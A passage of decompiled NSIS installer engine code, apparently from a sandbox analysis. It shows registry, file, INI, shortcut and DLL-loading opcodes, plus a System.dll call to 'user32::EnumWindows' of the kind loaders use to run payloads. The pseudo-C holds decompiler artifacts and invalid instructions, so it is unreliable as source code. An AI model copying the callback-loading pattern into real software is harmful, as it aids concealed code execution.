						__eax = E00403002("true");
						__eax = GetDlgItem(__eax, __esi);
						goto L98;
					case 0x21:
						__esi =  *0x435a48;
						__esi =  *0x435a48 + __eax;
						E00403002(0) = SetWindowLongW(__eax, 0xffffffeb, __esi);
						goto L403;
					case 0x22:
						__eflags =  *(__esp + 0x34) & 0x00000100;
						if (( *(__esp + 0x34) & 0x00000100) == 0) goto L186;
						__eflags = __ch;
					case 0x23:
						__edi = GetDC(__edx);
						__esi = E00403002(2);
						__eax = GetDeviceCaps(__edi, 0x5a);
						__eax = MulDiv(__esi, __eax, "true");
						0x40d908->lfHeight = __eax;
						 *(__esp + 0x20) = ReleaseDC( *(__esp + 0x20), __edi);
						__eax = E00403002(3);
						__ecx =  *(__esp + 0x38);
						_push( *(__esp + 0x2c));
						 *0x40d918 = __eax;
						__cl = __cl & 0x00000001;
						 *0x40d91f = 1;
						 *0x40d91c = __cl & 0x00000001;
						__al = __cl;
						__al = __cl & 0x00000002;
						__cl = __cl & 0x00000004;
						_push("Calibri");
						 *0x40d91d = __al;
						 *0x40d91e = __cl;
						__eax = E00405EBA();
						__eax = CreateFontIndirectW(0x40d908);
						__ebp =  *(__esp + 0x1c);
						_push(__eax);
						_push(__ebp);
						goto L21;
					case 0x24:
						__esi = E00403002(0);
						_push(E00403002("true"));
						_push(__esi);
						__eflags =  *(__esp + 0x3c);
						if( *(__esp + 0x3c) != 0) {
							__eax = EnableWindow();
						} else {
							__eax = ShowWindow();
						}
						goto L403;
					case 0x25:
						0 = E0040303E(__edx, 0);
						__esi = E0040303E(__edx, 0x31);
						__edi = E0040303E(__edx, 0x22);
						E0040303E(__edx, 0x15) = E00405D3A("true", "C:\Users\Arthur\AppData\Local\Temp\nsb12B3.tmp\System.dll");
						__ecx =  *(__esp + 0x38);
						__eax =  *(__esp + 0x20);
						 *(__esp + 0x58) =  *(__esp + 0x20);
						__eax = 0;
						 *(__esp + 0x54) =  *(__esp + 0x38);
						__ecx =  *(__esp + 0x34);
						 *(__esp + 0x6c) = __ecx;
						__eflags =  *__ebx - __bp;
						 *(__esp + 0x60) = __esi;
						__eax =  !=  ? __ebx : 0;
						 *(__esp + 0x5c) =  !=  ? __ebx : 0;
						__eax = 0;
						__eflags =  *__edi - __bp;
						 *(__esp + 0x68) = L"C:\\Users\\Arthur\\AppData\\Local\\Temp\\mnstring";
						__eax =  !=  ? __edi : 0;
						 *(__esp + 0x64) =  !=  ? __edi : 0;
						__eax = __esp + 0x50;
						__eax = E004069F3(__esp + 0x50);
						__eflags = __eax;
						if(__eax == 0) {
							goto L28;
						}
						__eflags =  *(__esp + 0x54) & 0x00000040;
						if(( *(__esp + 0x54) & 0x00000040) == 0) {
							goto L403;
						}
						__eax = E00406514(__ecx,  *(__esp + 0x88));
						__eax = CloseHandle( *(__esp + 0x88));
						goto L202;
					case 0x26:
						__esi = E0040303E(__edx, 0);
						__eax = E00405D3A(0xffffffeb, __eax);
						__eax = E004066D6(__esi); // executed
						__ebx =  *(__esp + 0x10);
						__esi = __eax;
						__eflags = __esi;
						if(__esi == 0) {
							goto L28;
						}
						__eflags =  *(__esp + 0x30);
						if( *(__esp + 0x30) != 0) {
							__eax = E00406514(__ecx, __esi);
							__eflags =  *(__esp + 0x2c);
							if( *(__esp + 0x2c) < 0) {
								0 = 1;
								__eflags = __eax;
								 *(__esp + 0x10) = 0;
							} else {
								__eax = E0040661F( *(__esp + 0x18), __eax);
							}
						}
						__eax = CloseHandle(__esi);
						goto L202;
					case 0x27:
						__eax = E0040303E(__edx, 2);
						0 = __eax;
						__eflags = __ebx;
						if(__ebx == 0) {
							__eax = 0;
							 *__edi = __ax;
							 *__esi = __ax;
							goto L28;
						}
						__eax = E0040661F(__esi, __ebx[0xa]);
						_push(__ebx[0xc]);
						goto L20;
					case 0x28:
						__eax = E0040303E(__edx, 0xffffffee);
						__ecx = __esp + 0x50;
						 *(__esp + 0x4c) = __eax;
						_push(__esp + 0x50);
						_push(__eax);
						__eax = E004068E6(0xa);
						__eax =  *__eax();
						__ecx = 0;
						 *(__esp + 0x18) = __eax;
						__ebx = 0;
						 *__edi = __cx;
						__ebx = 1;
						 *__esi = __cx;
						__eflags = __eax;
						if(__eax != 0) {
							__eax = GlobalAlloc("true", __eax);
							 *(__esp + 0x1c) = __eax;
							__eflags = __eax;
							if(__eax != 0) {
								__esi = E004068E6(0xb);
								__eax = E004068E6("true");
								_push( *(__esp + 0x1c));
								 *(__esp + 0x24) = __eax;
								_push( *(__esp + 0x1c));
								_push(0);
								_push( *(__esp + 0x58));
								__eax =  *__esi();
								__eflags = __eax;
								if(__eax != 0) {
									__eax = __esp + 0x44;
									_push(__esp + 0x44);
									__eax = __esp + 0x44;
									_push(__esp + 0x44);
									_push(0x4092b0);
									_push( *(__esp + 0x28));
									__eax =  *(__esp + 0x30)();
									__eflags = __eax;
									if(__eax != 0) {
										__ecx =  *(__esp + 0x40);
										 *(__esp + 0x34) = E0040661F(__edi,  *((intOrPtr*)( *(__esp + 0x40) + 8 +  *(__esp + 0x34) * 4)));
										__ecx =  *(__esp + 0x34);
										 *(__esp + 0x40) = E0040661F( *(__esp + 0x18),  *((intOrPtr*)( *(__esp + 0x40) + 0xc +  *(__esp + 0x34) * 4)));
										__ebx = 0;
									}
								}
								__eax = GlobalFree( *(__esp + 0x1c));
							}
						}
						goto L404;
					case 0x29:
						__esi = 0;
						__esi = 1;
						__ebx = 1;
						__eflags =  *0x435a60;
						if( *0x435a60 < 0) {
							_push("C:\Users\Arthur\AppData\Local\Temp\nsb12B3.tmp\System.dll");
							_push(0xffffffe7);
							goto L234;
						}
						__edi = E0040303E(__edx, "true");
						 *(__esp + 0x1c) = __edi;
						 *(__esp + 0x14) = E0040303E(__edx, 1);
						__eflags =  *(__esp + 0x38);
						if( *(__esp + 0x38) == 0) {
							L222:
							__eax = LoadLibraryExW(__edi, __ebp, "true"); // executed
							__edi = __eax;
							__eflags = __edi;
							if(__eflags == 0) {
								_push("C:\Users\Arthur\AppData\Local\Temp\nsb12B3.tmp\System.dll");
								_push(0xfffffff6);
								goto L234;
							}
							L223:
							0 = E00406269(__eflags, __edi,  *(__esp + 0x14));
							 *(__esp + 0x18) = __ecx;
							__eflags = __ecx;
							if(__ecx == 0) {
								__eax = E00405D3A(0xfffffff7,  *(__esp + 0x14));
							} else {
								__ebx = __ebp;
								__eflags =  *(__esp + 0x30) - __ebp;
								if( *(__esp + 0x30) == __ebp) {
									__eax =  *(__esp + 0x20);
									_push(0x40b000);
									_push(0x40b100);
									_push(L"user32::EnumWindows(i r1 ,i 0)");
									_push(0x400);
									_push(__eax);
									__eax =  *__ecx();
									__esp = __esp + 0x14;
								} else {
									__eax = E00405D3A( *(__esp + 0x34), "C:\Users\Arthur\AppData\Local\Temp\nsb12B3.tmp\System.dll");
									__eax =  *(__esp + 0x18)();
									__eflags = __eax;
									if(__eax != 0) {
										__ebx = __esi;
									}
								}
							}
							__eflags =  *(__esp + 0x34) - __ebp;
							if( *(__esp + 0x34) == __ebp) {
								__eax = E00403CD6(__edi);
								__eflags = __eax;
								if(__eax != 0) {
									__eax = FreeLibrary(__edi);
								}
							}
							goto L404;
						}
						__eax = GetModuleHandleW(__edi); // executed
						__edi = __eax;
						__eflags = __edi;
						if(__eflags != 0) {
							goto L223;
						}
						__edi =  *(__esp + 0x18);
						goto L222;
					case 0x2a:
						 *(__esp + 0x54) = E0040303E(__edx, 0xfffffff0);
						__eax = E0040303E(__edx, 0xffffffdf);
						__ebx = __eax;
						 *(__esp + 0x1c) = __eax;
						 *(__esp + 0x4c) = E0040303E(__edx, 2);
						 *(__esp + 0x50) = E0040303E(__edx, 0xffffffcd);
						 *(__esp + 0x44) = E0040303E(__edx, 0x45);
						__eax =  *(__esp + 0x38);
						__eax = __eax & 0x00000fff;
						__edi = __eax;
						 *(__esp + 0x20) = __eax & 0x00000fff;
						__ecx = __eax;
						__ecx = __eax & 0x00008000;
						__eax = __eax >> 0x10;
						__edi = __edi >> 0xc;
						 *(__esp + 0x20) = __ecx;
						__edi = __edi & 0x00000007;
						 *(__esp + 0x44) = __eax;
						__eax = E00406E03(__ebx);
						__eflags = __eax;
						if(__eax == 0) {
							__eax = E0040303E(__edx, 0x21);
						}
						__eax = __esp + 0x10;
						__esi = 0;
						_push(__eax);
						_push(0x409abc);
						__esi = 1;
						_push(1);
						_push(__ebp);
						_push(0x409adc);
						__imp__CoCreateInstance();
						__ebx = __eax;
						__eflags = __ebx;
						if(__ebx >= 0) {
							__eax =  *(__esp + 0x10);
							__edx = __esp + 0x14;
							_push(__esp + 0x14);
							_push(0x409acc);
							_push(__eax);
							__ecx =  *__eax;
							0 = __eax;
							__eflags = __ebx;
							if(__ebx >= 0) {
								__eax =  *(__esp + 0x10);
								_push( *(__esp + 0x18));
								_push(__eax);
								__ecx =  *__eax;
								0 = __eax;
								__eflags =  *(__esp + 0x1c) - __ebp;
								if( *(__esp + 0x1c) == __ebp) {
									__eax =  *(__esp + 0x10);
									_push(L"C:\\Users\\Arthur\\AppData\\Local\\Temp\\mnstring");
									_push(__eax);
									__ecx =  *__eax;
									__eax =  *((intOrPtr*)( *__eax + 0x24))();
								}
								__eflags = __edi;
								if(__edi != 0) {
									__eax =  *(__esp + 0x10);
									_push(__edi);
									_push(__eax);
									__ecx =  *__eax;
									__eax =  *((intOrPtr*)( *__eax + 0x3c))();
								}
								__eax =  *(__esp + 0x10);
								_push( *(__esp + 0x40));
								_push(__eax);
								__ecx =  *__eax;
								__eax =  *((intOrPtr*)( *__eax + 0x34))();
								__edx =  *(__esp + 0x4c);
								__eflags = __edx->i - __bp;
								if(__edx->i != __bp) {
									__eax =  *(__esp + 0x10);
									_push( *(__esp + 0x20));
									_push(__edx);
									__ecx =  *__eax;
									_push(__eax);
									__eax =  *((intOrPtr*)( *__eax + 0x44))();
								}
								__eax =  *(__esp + 0x10);
								_push( *(__esp + 0x48));
								_push(__eax);
								__ecx =  *__eax;
								__eax =  *((intOrPtr*)( *__eax + 0x2c))();
								__eax =  *(__esp + 0x10);
								_push( *(__esp + 0x44));
								_push(__eax);
								__ecx =  *__eax;
								__eax =  *((intOrPtr*)( *__eax + 0x1c))();
								__eflags = __ebx;
								if(__ebx >= 0) {
									__eax =  *(__esp + 0x14);
									_push(__esi);
									_push( *(__esp + 0x54));
									__ecx =  *__eax;
									_push(__eax);
									0 = __eax;
								}
								__eax =  *(__esp + 0x14);
								_push(__eax);
								__ecx =  *__eax;
								__eax =  *((intOrPtr*)( *__eax + 8))();
							}
							__eax =  *(__esp + 0x10);
							_push(__eax);
							__ecx =  *__eax;
							__eax =  *((intOrPtr*)( *__eax + 8))();
						}
						__ebx = 0 >> 0x1f;
						0xbadbac = 0xbadba0;
						__eax = E00405D3A(0xbadba0, 0x40b908);
						__ebx = __ebx >> 0x1f;
						goto L404;
					case 0x2b:
						__esi = E0040303E(__edx, 0);
						__edi = E0040303E(__edx, 0x11);
						0 = E0040303E(__edx, 0x23);
						__eax = E004065CF(__esi);
						__eflags = __eax;
						if(__eax != 0) {
							__eax =  *(__esp + 0x20);
							 *(__esp + 0x54) =  *(__esp + 0x20);
							 *(__esp + 0x58) = 2;
							__eax = lstrlenW(__esi);
							__ecx = 0;
							 *(__esi + 2 + __eax * 2) = __cx;
							__eax = lstrlenW(__edi);
							__ecx = 0;
							 *(__edi + 2 + __eax * 2) = __cx;
							__ax =  *(__esp + 0x38);
							 *(__esp + 0x60) = __esi;
							 *(__esp + 0x64) = __edi;
							 *(__esp + 0x72) = __ebx;
							 *(__esp + 0x68) =  *(__esp + 0x38);
							E00405D3A(0, __ebx) = __esp + 0x50;
							__eax = SHFileOperationW(__esp + 0x50);
							__eflags = __eax;
							if(__eax == 0) {
								goto L403;
							}
						}
						__eax = E00405D3A(0xfffffff9, __ebp);
						goto L28;
					case 0x2c:
						__eflags = __ecx - 0xbadf00d;
						if(__ecx != 0xbadf00d) {
							L161:
							_push(0x200010);
							_push("true");
							_push(__ebp);
							_push(E00405EBA());
							L89:
							__eax = E00406AA8();
							L5:
							__eax = 0x7fffffff;
							return 0x7fffffff;
						}
						 *0x435ad4 =  *0x435ad4 + 1;
						goto L403;
					case 0x2d:
						__esi = 0;
						__edi = 0;
						__eflags = __ecx;
						if(__ecx != 0) {
							__ebp = E0040303E(__edx, 0);
							__eax =  *(__esp + 0x2c);
						}
						__eflags = __eax;
						if(__eax != 0) {
							__esi = E0040303E(__edx, 0x11);
						}
						__eflags =  *(__esp + 0x38) - __edi;
						if( *(__esp + 0x38) != __edi) {
							__edi = E0040303E(__edx, 0x22);
						}
						__eax = E0040303E(__edx, 0xffffffcd);
						__eax = WritePrivateProfileStringW(__ebp, __esi, __edi, __eax); // executed
						L27:
						__eflags = __eax;
						if(__eax != 0) {
							goto L403;
						}
						goto L28;
					case 0x2e:
						__ebx = 0;
						 *(__esp + 0x50) = 0xa;
						__ebx = 1;
						__edi = E0040303E(__edx, 1);
						__esi = E0040303E(__edx, 0x12);
						__eax = E0040303E(__edx, 0xffffffdd);
						__ebp =  *(__esp + 0x1c);
						__esp + 0x5c = GetPrivateProfileStringW(__edi, __esi, __esp + 0x5c, __ebp, 0x3ff, __esp + 0x5c);
						_push(0xa);
						_pop(__eax);
						__eflags =  *__ebp - __ax;
						if( *__ebp != __ax) {
							goto L403;
						}
						__eax = 0;
						 *__ebp = __ax;
						goto L404;
					case 0x2f:
						__edi = 0;
						__edi = 1;
						__eflags =  *(__esp + 0x38);
						if(__eflags != 0) {
							__eax = E0040303E(__edx, 0x22);
							 *(__esp + 0x38) =  *(__esp + 0x38) >> 1;
							__ecx =  *(__esp + 0x44);
							__edi = __eax;
						} else {
							__eax = E004030C1(__ecx, __edx, __eflags, 2); // executed
							__esi = __eax;
							__eflags = __esi;
							if(__esi != 0) {
								__eax = E0040303E(__edx, 0x33);
								__edi = __eax;
								__eax = RegCloseKey(__esi);
							}
						}
						__ebx = 0;
						__eflags = __edi;
						__ebx = 0 | __edi != 0x00000000;
						goto L404;
					case 0x30:
						__eax =  *(__esp + 0x38);
						 *(__esp + 0x18) =  *(__esp + 0x38);
						__eax =  *(__esp + 0x3c);
						 *(__esp + 0x18) =  *(__esp + 0x3c);
						 *(__esp + 0x20) = E0040303E(__edx, 2);
						__eax = E0040303E(__edx, 0x11);
						__ecx = __esp + 0x44;
						0 = 1;
						__ebx = 1;
						__eax = E00403023( *(__esp + 0x5c));
						__eax = E004062A5(__eflags, __eax, __eax, 0x100022, __esp + 0x44); // executed
						__edi =  *(__esp + 0x44);
						__ecx = 0;
						__eflags = __eax;
						__edi =  !=  ? 0 :  *(__esp + 0x44);
						 *(__esp + 0x50) = __edi;
						__eflags = __edi;
						if(__edi == 0) {
							goto L404;
						}
						__eax =  *(__esp + 0x18);
						__edi = 0x40c108;
						__eflags = __eax - 1;
						if(__eax != 1) {
							_push("true");
							_pop(__esi);
							__eflags = __eax - 1;
							if(__eax != 1) {
								__esi = 0;
								__eflags = __eax - 3;
								if(__eax == 3) {
									0 = E00403148( *(__esp + 0x40), 0, 0x40c108, 0x1800);
								}
							} else {
								 *0x40c108 = E00403002(3);
							}
						} else {
							__eax = E0040303E(__edx, 0x23);
							0 = 2 + lstrlenW(0x40c108) * 2;
						}
						__esi =  *(__esp + 0x54);
						__eax = RegSetValueExW(__esi,  *(__esp + 0x2c), __ebp,  *(__esp + 0x1c), __edi, __esi); // executed
						__eax =  ~__eax;
						asm("sbb eax, eax");
						__eflags = 0;
						goto L278;
					case 0x31:
						__eax = E004030C1(__ecx, __edx, __eflags, 0x20019); // executed
						__esi = __eax;
						__eax = E0040303E(__edx, 0x33);
						__ecx = 0;
						 *__edi = __cx;
						__eflags = __esi;
						if(__esi == 0) {
							goto L28;
						}
						__ecx = __esp + 0x50;
						 *(__esp + 0x50) = 0x800;
						__ecx = __esp + 0x24;
						__eax = RegQueryValueExW(__esi, __eax, 0, __esp + 0x24, __edi, __esp + 0x50); // executed
						__ecx = 0;
						__ecx = 1;
						__eflags = __eax;
						if(__eax != 0) {
							L286:
							__eax = 0;
							__ebx = __ecx;
							 *__edi = __ax;
							L278:
							__eax = RegCloseKey(__esi); // executed
							goto L404;
						}
						__eflags =  *(__esp + 0x1c) - 4;
						if( *(__esp + 0x1c) == 4) {
							__ebx = 0;
							__eflags =  *(__esp + 0x3c);
							__ebx = 0 |  *(__esp + 0x3c) == 0x00000000;
							__eax = E0040661F(__edi,  *__edi);
							goto L278;
						}
						__eflags =  *(__esp + 0x1c) - 1;
						if( *(__esp + 0x1c) == 1) {
							L284:
							__ebx =  *(__esp + 0x38);
							__eax = 0;
							 *(__edi + 0x7fe) = __ax;
							goto L278;
						}
						__eflags =  *(__esp + 0x1c) - 2;
						if( *(__esp + 0x1c) != 2) {
							goto L286;
						}
						goto L284;
					case 0x32:
						__eax = E004030C1(__ecx, __edx, __eflags, 0x20019); // executed
						__esi = __eax;
						__eax = E00403002(3);
						__ebx =  *(__esp + 0x14);
						__ecx = 0;
						 *__edi = __cx;
						__eflags = __esi;
						if(__esi == 0) {
							goto L28;
						}
						__ecx = 0x3ff;
						 *(__esp + 0x50) = 0x3ff;
						__eflags =  *(__esp + 0x38);
						if( *(__esp + 0x38) == 0) {
							__ecx = __esp + 0x60;
							__eax = RegEnumValueW(__esi, __eax, __edi, __esp + 0x60, 0, 0, 0, 0);
							0 = 1;
							__eflags = __eax;
							 *(__esp + 0x10) = 0;
						} else {
							__eax = RegEnumKeyW(__esi, __eax, __edi, 0x3ff);
						}
						__eax = 0;
						 *(__edi + 0x7fe) = __ax;
						__eax = RegCloseKey(__esi);
						goto L403;
					case 0x33:
						__eax = E00406C25(__edi);
						__eflags = __eax;
						if(__eax == 0) {
							goto L403;
						}
						__eax = CloseHandle(__eax);
						L202:
						goto L403;
					case 0x34:
						__eax = E0040303E(__edx, 0xffffffed);
						__eax = E0040691B(__eax,  *(__esp + 0x30),  *(__esp + 0x30));
						__eflags = __eax - 0xffffffff;
						if(__eax != 0xffffffff) {
							L98:
							_push(__eax);
							L20:
							_push(__edi);
							goto L21;
						}
						goto L295;
					case 0x35:
						__ecx =  *(__esp + 0x24);
						__eax = 0;
						__edx =  *(__esp + 0x30);
						__eflags = __ecx - 0x38;
						 *(__esp + 0x50) = __edx;
						__esi = 0x40b908;
						__eax = 0 | __eflags == 0x00000000;
						0 = 1;
						 *(__esp + 0x14) = __eflags == 0;
						__eflags = __edx;
						if(__edx == 0) {
							__eflags = __ecx - 0x38;
							if(__ecx != 0x38) {
								__eax = E0040303E(__edx, 0x11);
								__eax = lstrlenW(__eax);
								__eflags = __eax + __eax;
							} else {
								E0040303E(__edx, 0x21) = E00406469("C:\Users\Arthur\AppData\Local\Temp\nsb12B3.tmp", 0x40b908, 0x400);
								__esi = lstrlenA(0x40b908);
							}
						} else {
							__eax = E00403002(1);
							 *(__esp + 0x18) =  *(__esp + 0x18) ^ 1;
							 *0x40b908 = __ax;
							__esi = ( *(__esp + 0x18) ^ 1) + 1;
						}
						__eflags =  *__edi - __bp;
						if( *__edi == __bp) {
							goto L404;
						} else {
							__edi = E00406C25(__edi);
							 *(__esp + 0x14) =  *(__esp + 0x14) |  *(__esp + 0x50);
							__eflags =  *(__esp + 0x14) |  *(__esp + 0x50);
							if(( *(__esp + 0x14) |  *(__esp + 0x50)) != 0) {
								L305:
								__eax = E00406A0B(__ecx, __edi, "C:\Users\Arthur\AppData\Local\Temp\nsb12B3.tmp\System.dll", __esi);
								__eflags = __eax;
								if(__eax != 0) {
									goto L403;
								}
								goto L404;
							}
							__eflags =  *(__esp + 0x34) - __ebp;
							if( *(__esp + 0x34) == __ebp) {
								goto L305;
							}
							__eax = E00406484(__edi, __edi);
							__eflags = __eax;
							if(__eax < 0) {
								goto L404;
							}
							goto L305;
						}
					case 0x36:
						_push(2);
						_pop(__ecx);
						 *(__esp + 0x18) = 0;
						 *(__esp + 0x24) = __ecx;
						__eax = E00403002(__ecx);
						__ebx = 0;
						__ebx = 1;
						__eflags = __eax - 1;
						if(__eax < 1) {
							goto L403;
						}
						__ecx = 0x3ff;
						__eflags = __eax - 0x3ff;
						 *(__esp + 0x18) = __eax;
						__eflags =  *__edi - __bp;
						if( *__edi == __bp) {
							L331:
							__eax =  *(__esp + 0x14);
							__ecx = 0;
							__ebx = 0;
							__eflags = __eax;
							 *(__esi + __eax * 2) = __cx;
							L80:
							__ebx = __ebx & 0xffffff00 | __eflags == 0x00000000;
							goto L404;
						}
						 *(__esp + 0x44) = 0;
						0 = E00406C25(__edi);
						 *(__esp + 0x1c) = __ecx;
						__eflags =  *(__esp + 0x18);
						if( *(__esp + 0x18) <= 0) {
							goto L331;
						}
						 *(__esp + 0x44) = 0xd;
						__edi = 0;
						do {
							__eflags =  *(__esp + 0x24) - 0x39;
							if( *(__esp + 0x24) != 0x39) {
								__eflags =  *(__esp + 0x34) - __ebp;
								if( *(__esp + 0x34) != __ebp) {
									L324:
									__eax = __esp + 0x4c;
									__eax = E00406948(__ecx, __ecx, __esp + 0x4c, 2);
									__eflags = __eax;
									if(__eax == 0) {
										goto L331;
									}
									L325:
									__ecx =  *(__esp + 0x20);
									__eax =  *(__esp + 0x48);
									L326:
									__eflags =  *(__esp + 0x34) - __ebp;
									if( *(__esp + 0x34) != __ebp) {
										L338:
										__ax & 0x0000ffff = E0040661F(__esi, __ax & 0x0000ffff);
										goto L405;
									}
									_push(0xd);
									_pop(__edx);
									__eflags =  *(__esp + 0x40) - __dx;
									_push(0xa);
									_pop(__edx);
									if(__eflags == 0) {
										L332:
										__eflags =  *(__esp + 0x40) - __ax;
										if( *(__esp + 0x40) == __ax) {
											L337:
											__eax = SetFilePointer( *(__esp + 0x28), 0, __ebp, 0);
											goto L331;
										}
										__eflags = __ax -  *(__esp + 0x44);
										if(__ax ==  *(__esp + 0x44)) {
											L335:
											 *(__esi + __edi * 2) = __ax;
											__edi = __edi + 1;
											__eflags = __edi;
											 *(__esp + 0x14) = __edi;
											asm("adc al, 0xeb");
											asm("iretd");
											goto L331;
										}
										__eflags = __ax - __dx;
										if(__ax != __dx) {
											goto L337;
										}
										goto L335;
									}
									__eflags =  *(__esp + 0x40) - __dx;
									if( *(__esp + 0x40) == __dx) {
										goto L332;
									}
									 *(__esi + __edi * 2) = __ax;
									__edi = __edi + 1;
									__eax = __ax & 0x0000ffff;
									 *(__esp + 0x14) = __edi;
									 *(__esp + 0x40) = __ax & 0x0000ffff;
									__eflags = __ax;
									if(__ax == 0) {
										goto L331;
									}
									goto L330;
								}
								__eflags = __edi;
								if(__edi != 0) {
									goto L324;
								}
								__eax = E00406484(__ecx, __ebp);
								__eflags = __eax;
								if(__eax < 0) {
									goto L331;
								}
								__ecx =  *(__esp + 0x1c);
								goto L324;
							}
							_push(__ebp);
							__eax = __esp + 0x50;
							_push(__esp + 0x50);
							_push(2);
							_pop(__eax);
							__eax = __esp + 0x1c;
							__eax = ReadFile(__ecx, __esp + 0x1c, __eax, ??, ??);
							__eflags = __eax;
							if(__eax == 0) {
								goto L331;
							}
							__ecx =  *(__esp + 0x4c);
							 *(__esp + 0x20) = __ecx;
							__eflags = __ecx;
							if(__ecx == 0) {
								goto L331;
							}
							__eax =  *(__esp + 0x10) & 0x000000ff;
							 *(__esp + 0x48) =  *(__esp + 0x10) & 0x000000ff;
							__eflags =  *(__esp + 0x34) - __ebp;
							if( *(__esp + 0x34) != __ebp) {
								goto L338;
							}
							__esp + 0x4c = __esp + 0x1c;
							__eax = MultiByteToWideChar(__ebp, 8, __esp + 0x1c, __ecx, __esp + 0x4c, __ebx);
							__eflags = __eax;
							if(__eax != 0) {
								goto L325;
							}
							__ecx =  *(__esp + 0x20);
							__edx = __ecx;
							__edx =  ~__ecx;
							while(1) {
								_t352 = __esp + 0x4c;
								 *_t352 =  *(__esp + 0x4c) - 1;
								__eflags =  *_t352;
								__eax = 0xfffd;
								 *(__esp + 0x48) = 0xfffd;
								if( *_t352 == 0) {
									goto L326;
								}
								__ecx = __ecx - 1;
								__edx =  &(__edx->i);
								 *(__esp + 0x30) = __ecx;
								 *(__esp + 0x60) = __edx;
								SetFilePointer( *(__esp + 0x28), __edx, __ebp, __ebx) = __esp + 0x4c;
								__eax = __esp + 0x1c;
								__eax = MultiByteToWideChar(__ebp, 8, __esp + 0x1c,  *(__esp + 0x54), __esp + 0x4c, __ebx);
								__ecx =  *(__esp + 0x20);
								__edx =  *(__esp + 0x50);
								__eflags = __eax;
								if(__eax == 0) {
									continue;
								}
								goto L325;
							}
							goto L326;
							L330:
							__ecx =  *(__esp + 0x1c);
							__eflags = __edi -  *(__esp + 0x18);
						} while (__edi <  *(__esp + 0x18));
						goto L331;
					case 0x37:
						__eflags =  *__edi - __bp;
						if( *__edi == __bp) {
							goto L403;
						}
						__eax = E00403002(2);
						__eax = E00406C25(__edi);
						__eax = SetFilePointer(__eax, __eax, 0,  *(__esp + 0x34));
						__eflags =  *(__esp + 0x2c);
						if( *(__esp + 0x2c) < 0) {
							goto L403;
						}
						goto L341;
					case 0x38:
						__eax = E00406C25(__edi);
						__eflags = __eax;
						if(__eax != 0) {
							__eax = FindClose(__eax);
						}
						goto L403;
					case 0x39:
						__eax = E00406C25(__esi);
						__eflags = __eax;
						if(__eax == 0) {
							L61:
							0 = 1;
							__eax = 0;
							 *__edi = __ax;
							goto L404;
						}
						__ecx = __esp + 0x8c;
						__eax = FindNextFileW(__eax, __esp + 0x8c);
						__eflags = __eax;
						if(__eax == 0) {
							goto L61;
						}
						goto L346;
					case 0x3a:
						__eax = E0040303E(__edx, 2);
						__ecx = __esp + 0x8c;
						__eax = FindFirstFileW(__eax, __esp + 0x8c);
						__eflags = __eax - 0xffffffff;
						if(__eax != 0xffffffff) {
							__eax = E0040661F(__esi, __eax);
							L346:
							__eax = __esp + 0xb8;
							_push(__esp + 0xb8);
							_push(__edi);
							L160:
							__eax = E00406B1A();
							goto L403;
						}
						__eax = 0;
						 *__esi = __ax;
						L295:
						__eax = 0;
						 *__edi = __ax;
						goto L28;
					case 0x3b:
						 *(__esp + 0x1c) = 0xfffffd66;
						0 = E0040303E(__edx, 0xfffffff0);
						 *(__esp + 0x54) = __ebx;
						__eax = E00406E03(__ebx);
						__eflags = __eax;
						if(__eax == 0) {
							__eax = E0040303E(__edx, 0xffffffed);
						}
						__eax = E00406B9D(__ebx);
						_push(2);
						_push(0x40000000);
						__eax =  &(__eax[0]);
						_push(__ebx);
						__edi = E0040691B();
						 *(__esp + 0x1c) = __edi;
						__eflags = __edi - 0xffffffff;
						if(__edi == 0xffffffff) {
							L365:
							_push(0xfffffff3);
							_pop(__esi);
							__eflags =  *(__esp + 0x18) - __ebp;
							if( *(__esp + 0x18) >= __ebp) {
								__ebx =  *(__esp + 0x10);
							} else {
								_push(0xffffffef);
								_pop(__esi);
								__eax = DeleteFileW(__ebx);
								0 = 1;
							}
							_push("C:\Users\Arthur\AppData\Local\Temp\nsb12B3.tmp\System.dll");
							_push(__esi);
							L234:
							__eax = E00405D3A();
							goto L404;
						} else {
							__eax =  *(__esp + 0x2c);
							 *(__esp + 0x44) =  *(__esp + 0x2c);
							__eflags =  *(__esp + 0x30) - __ebp;
							if( *(__esp + 0x30) == __ebp) {
								L364:
								 *(__esp + 0x1c) = __eax;
								__eax = CloseHandle(__edi);
								goto L365;
							}
							__eax =  *0x435a08;
							 *(__esp + 0x1c) = __eax;
							__esi = __eax;
							 *(__esp + 0x18) = __esi;
							__eflags = __esi;
							if(__esi == 0) {
								__eax =  *(__esp + 0x44);
								goto L364;
							}
							E00403131(__ebp) = E0040311B(__esi,  *(__esp + 0x14));
							__edi = GlobalAlloc("true",  *(__esp + 0x30));
							 *(__esp + 0x44) = __edi;
							__eflags = __edi;
							if(__edi == 0) {
								L362:
								__edi =  *(__esp + 0x20);
								__eax = E00406A0B(__ecx, __edi, __esi,  *(__esp + 0x14));
								GlobalFree(__esi) = __eax | 0xffffffff;
								goto L364;
							}
							__eax = E00403148( *(__esp + 0x38), __ebp, __edi,  *(__esp + 0x30));
							__eflags =  *__edi;
							if( *__edi == 0) {
								L361:
								__eax = GlobalFree( *(__esp + 0x44));
								goto L362;
							}
							__ebx = __esi;
							do {
								__esi =  *__edi;
								__eax =  *(__edi + 4);
								__edi = __edi + 8;
								__eax = E004066B4(__eax, __edi, __esi);
								__edi = __edi + __esi;
								__eflags =  *__edi;
							} while ( *__edi != 0);
							__ebx =  *(__esp + 0x50);
							__esi =  *(__esp + 0x18);
							goto L361;
						}
					case 0x3c:
						__eax = E00403002(0);
						__ebx = __eax;
						__eflags = __ebx -  *0x435a2c;
						if (__ebx -  *0x435a2c >= 0) goto L28;
						_push(ss);
						switch(0x3024) {
						}
					case 0x3d:
						__edx = E00403002(0);
						__eflags = __edx - 0x20;
						if(__edx >= 0x20) {
							L28:
							0 = 1;
							goto L404;
						}
						__eflags =  *(__esp + 0x34);
						if( *(__esp + 0x34) == 0) {
							__eax =  *0x435a10;
							__eflags =  *(__esp + 0x30);
							if( *(__esp + 0x30) == 0) {
								_push( *(__eax + 0x94 + __edx * 4));
								_push(__esi);
								__eax = E00405EBA();
							} else {
								__ecx =  *(__esp + 0x2c);
								 *(__eax + 0x94 + __edx * 4) =  *(__esp + 0x2c);
							}
							goto L403;
						}
						__eflags =  *(__esp + 0x30);
						if( *(__esp + 0x30) == 0) {
							__eax = E004011A0(0);
							asm("in al, 0xff");
							asm("invalid");
							asm("invalid");
							L341:
							_push(__eax);
							_push(__esi);
							goto L21;
						}
						__eax = E00401290(__edx);
						__eax = E004012DD(0, 0);
						__ecx = __ecx - 1;
						asm("in eax, 0xff");
						asm("invalid");
						 *__ecx =  *__ecx | __al;
						 *__eax =  *__eax + __al;
